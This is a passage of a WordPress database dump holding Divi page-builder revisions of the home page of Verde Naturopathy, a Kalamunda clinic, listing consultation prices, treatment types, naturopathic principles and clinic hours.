text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-24 13:08:59','2021-05-24 05:08:59','',28,'https://verde.desidrivers.com.au/?p=105',0,'revision','',0),(109,1,'2021-05-24 13:14:28','2021-05-24 05:14:28','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" inline_fonts=\"Montserrat,Playfair Display\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" column_structure=\"1_3,1_3,1_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Initial consult (90 min) - $120\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" title_text=\"Icon\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Return consult (50 min) - $80\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" title_text=\"5-01\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\" custom_padding=\"||0px|||\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_5\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image title_text=\"3-01\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\" src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.jpg\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-24 13:14:28','2021-05-24 05:14:28','',28,'https://verde.desidrivers.com.au/?p=109',0,'revision','',0),(107,1,'2021-05-24 13:11:54','2021-05-24 05:11:54','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" inline_fonts=\"Montserrat,Playfair Display\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Verde Naturopathy offers both face-to-face and online Zoom consultations.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" 